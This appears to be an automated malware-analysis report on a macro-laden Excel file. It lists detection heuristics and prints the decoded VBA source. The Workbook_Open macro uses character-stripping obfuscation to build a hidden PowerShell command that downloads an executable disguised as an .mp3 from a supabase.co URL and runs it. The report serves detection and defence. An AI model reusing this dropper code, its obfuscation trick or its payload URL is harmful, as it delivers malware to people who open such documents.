MALICIOUS
258
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBAMalformed OOXML local headers contain vbaProject.bin — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
Wtthdhcwg = Replace(Wtthdhcwg, "^", "") Set Fpubzzqsh = CreateObject("WScript.Shell") Set FpubzzqshExec = Fpubzzqsh.Exec(Wtthdhcwg) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Wtthdhcwg = Replace(Wtthdhcwg, "^", "") Set Fpubzzqsh = CreateObject("WScript.Shell") Set FpubzzqshExec = Fpubzzqsh.Exec(Wtthdhcwg) -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Wtthdhcwg = Replace(Wtthdhcwg, "^", "") Set Fpubzzqsh = CreateObject("WScript.Shell") Set FpubzzqshExec = Fpubzzqsh.Exec(Wtthdhcwg) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Wtthdhcwg = Replace(Wtthdhcwg, "^", "") Set Fpubzzqsh = CreateObject("WScript.Shell") Set FpubzzqshExec = Fpubzzqsh.Exec(Wtthdhcwg) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim Wtthdhcwg As String, sOutput As String -
Malformed OOXML package with recoverable local headers low OOXML_MALFORMED_ZIP_LOCAL_HEADERSThe OOXML ZIP central directory is invalid or missing, but local file headers expose a recoverable Office package. This can create parser divergence between tolerant Office/ZIP readers and scanners that rely only on the central directory.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://fnvimoyvwkbxbmczlqus.supabase.co/storage/v1/object/public/auths0/01/Honrghsmrei.mp3 Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
vbaProject_00.bin |
vba-project | Malformed OOXML local-header VBA project: xl/vbaProject.bin | 4608 bytes |
SHA-256: 754976b074f03f79d3e3d7b2cea2c7cd4691801563fa1455b6b77daecca9086d |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from malformed OOXML local headers) | 1345 bytes |
SHA-256: 9d0b5f72dfc1996d8f73addc28ff4c981bdc95989810c314be7df355d7b753b1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Wtthdhcwg As String, sOutput As String
Dim Fpubzzqsh As Object, FpubzzqshExec As Object
Wtthdhcwg = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } –Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://fnvimoyvwkbxbmczlqus.supabase.co/storage/v1/object/public/auths0/01/Honrghsmrei.mp3"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
Wtthdhcwg = Replace(Wtthdhcwg, "*", "")
Wtthdhcwg = Replace(Wtthdhcwg, "^", "")
Set Fpubzzqsh = CreateObject("WScript.Shell")
Set FpubzzqshExec = Fpubzzqsh.Exec(Wtthdhcwg)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.